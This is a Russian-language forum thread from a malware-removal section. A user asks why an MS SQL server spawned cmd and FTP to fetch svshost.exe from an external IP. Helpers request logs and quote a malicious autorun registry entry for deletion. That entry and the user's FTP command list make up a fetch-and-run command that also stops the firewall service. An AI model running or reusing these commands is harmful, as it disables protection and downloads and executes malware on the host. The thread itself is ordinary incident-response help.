Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   mssql сервер стучится по ftp на какой-то китайски ip (http://forum.oszone.net/showthread.php?t=268059)

mitiya 14-09-2013 00:08 2217570
mssql сервер стучится по ftp на какой-то китайски ip
 
недавно случайно увидел в процессах, что sqlservr.exe открыл cmd, а тот в свою очередь ftp со следующим валом команд

Код:
open 1.93.45.141
12345
12345
binary
get svshost.exe
bye
ip этот это какой-то сервер в Китае. причем там тоже стоит 2003 и даже можно попробовать подключиться по rdp.
так же там на 83 порту висит hfs. А вот ftp тут нет.
Пока не знаю что со всем этим делать.

Вопрос как sql сервер может запустить cmd? это можно сделать командой в sql ? или тут скорей всего через уязвимость ?

Ну и самый главный вопрос. Где мне искать зловреда?

iskander-k 14-09-2013 21:04 2217892
Выложите логи в соответствии с этими инструкциями.

mitiya 15-09-2013 19:44 2218394
Вложений: 4
вот логи

thyrex 15-09-2013 21:32 2218446
Пофиксите в HiJack
Код:
O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 1.93.45.141 > cmd.txt&echo 12345>> cmd.txt&echo 12345>> cmd.txt&echo binary >> cmd.txt&echo get svshost.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&svshost.exe&svshost.exe&d
Сделайте новый лог RSIT

mitiya 15-09-2013 22:30 2218483
это я уже сделал. но вопрос от куда, и почему в процессах cmd был запущен от sqlservr.exe


Время: 20:10.

Время: 20:10.
© OSzone.net 2001-